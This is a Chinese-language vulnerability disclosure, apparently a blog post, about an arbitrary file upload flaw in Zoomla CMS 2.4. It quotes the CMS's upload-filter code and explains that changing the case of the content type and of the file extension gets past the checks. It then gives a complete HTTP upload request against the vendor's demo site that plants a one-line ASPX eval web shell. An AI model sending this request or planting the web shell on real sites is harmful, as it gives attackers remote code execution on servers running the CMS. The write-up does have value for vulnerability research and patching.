逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤
1
asp_code.dll
class ZoomlaSecurityCenter

public static void CheckUpladFiles()

	{

		HttpRequest request = HttpContext.Current.Request;

		HttpResponse response = HttpContext.Current.Response;

		if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1)

		{

			HttpFileCollection files = request.Files;

			for (int i = 0; i < files.Count; i++)

			{

				HttpPostedFile httpPostedFile = files[i];

				string fileName = httpPostedFile.FileName;

				if (httpPostedFile.ContentLength > 0)

				{

					if (fileName.IndexOf(".") > -1)

					{

						string[] array = fileName.Split(new char[]

						{

							'.'

						});

						for (int j = 1; j < array.Length; j++)

						{

							string ext = array[j].ToString().ToLower();

							if (!ZoomlaSecurityCenter.ExNameCheck(ext))

							{

								string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", "");

								string text = SiteConfig.SiteOption.UploadFileExts.ToLower();

								if (!StringHelper.FoundCharInArr(text, findStr, "|"))

								{

									function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件");

									response.End();

								}

							}

							else

							{

								function.WriteErrMsg("请勿上传可疑文件!");

								response.End();

							}

						}

					}

					else

					{

						function.WriteErrMsg("请勿上传可疑文件!");

						response.End();

					}

				}

			}

		}

	}

将multipart/form-data的大小写改下就可以绕过了,局部过滤,可以改文件后缀名大小写绕过

POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1
Host: demo.zoomla.cn
Content-Length: 263
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYsh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//www.zoomla.cn/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1

------WebKitFormBoundaryNyS0P5wwqaOrCYsh
Content-Disposition: form-data; name="Filedata"; filename="name.Aspx"
Content-Type: application/x-aspx

<%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%>
------WebKitFormBoundaryNyS0P5wwqaOrCYsh--

发表评论